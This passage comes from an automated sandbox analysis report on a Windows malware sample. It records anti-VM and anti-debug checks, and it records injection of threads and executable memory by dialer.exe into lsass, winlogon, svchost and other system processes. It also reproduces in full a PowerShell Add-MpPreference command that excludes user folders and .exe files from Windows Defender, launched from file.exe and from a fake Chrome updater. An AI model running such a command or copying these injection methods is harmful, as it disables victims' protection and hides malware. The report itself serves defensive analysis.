            Source: C:\Windows\System32\svchost.exe TID: 7196Thread sleep count: 253 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7196Thread sleep time: -253000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 1796Thread sleep count: 252 > 30
            Source: C:\Windows\System32\svchost.exe TID: 1796Thread sleep time: -252000s >= -30000s
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199DCE0 FindFirstFileExW,34_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4DCE0 FindFirstFileExW,41_2_00000283E0F4DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CDCE0 FindFirstFileExW,66_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDDCE0 FindFirstFileExW,67_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16DCE0 FindFirstFileExW,68_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BADCE0 FindFirstFileExW,69_2_00000229F8BADCE0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
            Source: dwm.exe, 00000029.00000000.1406284421.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
            Source: svchost.exe, 00000028.00000002.2574027589.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000P
            Source: dwm.exe, 00000029.00000000.1406284421.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: lsass.exe, 00000022.00000002.2575122927.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388647255.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1399843989.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2573834327.0000014E25213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: svchost.exe, 00000028.00000002.2574027589.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_25-413
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_63-477
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_65-91
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
            Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BCD2A4
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000002A29199D2A4
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A291997D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000002A291997D90
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25EDD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25ED7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25ED7D90
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000283E0F4D2A4
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000283E0F47D90
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001FB539C7D90
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001FB539CD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001CBD8BD7D90
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001CBD8BDD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001F2BD167D90
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001F2BD16D2A4
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000229F8BA7D90
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000229F8BAD2A4

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1F385B90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 2A2911C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 14E255D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 283E0EE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1F385BF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 2A2919C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 14E25F00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 283E0F10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FB53990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F2BD130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 229F8B70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2938AFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2258F3D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26F54840000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22B76580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1265E790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18510D30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 200A2B70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F33CBD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FAB73D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D3E96E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2389D0D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22E66FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A4D6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20763780000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 200FF1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23CC6130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 266F1070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26008BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12E54DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2CF20530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19EA6340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: A50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1EC464E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15B351A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C38C460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DC09A20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C73F940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1616A5B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 181C5E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18E3AF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D70B1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26DA05C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C9B0460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23A7CF40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 184FCB80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 1CF1ED70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1697C550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F0FE030000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FC093B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C8004A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 118D8250000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27687590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28FAA0B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\explorer.exe base: B20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19292570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 221CFED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 15DAA130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 14A28E00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19605730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 22978560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DA311A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1ECA6C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17847BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 24FCA850000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 25_2_0000000140001C88
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 85B9273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 911C273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 255D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 85BF273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 919C273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 25F0273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E0F1273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5399273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D8BA273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BD13273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F8B7273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8AFD273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8F3D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5484273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7658273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5E79273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 10D3273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A2B7273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3CBD273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B73D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E96E273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 9D0D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 66FD273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D653273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6378273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FF1A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C613273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F107273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8BB273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 54DA273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 2053273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E9EA273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A634273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A5273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5C5A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 464E273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 351A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8C46273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 9A2273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3F94273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B0273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6A5B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C5E9273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3AF3273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B1D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A05C273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B046273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7CF4273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FCB8273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1ED7273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7C55273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FE03273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 93B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D825273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8759273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AA0B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B2273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 9257273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1FCE273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CFED273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 73B6273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6E81273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA13273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBD6273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28E0273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 573273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7EE6273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C03273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99B5273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9495273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7856273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 311C273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39FC273C
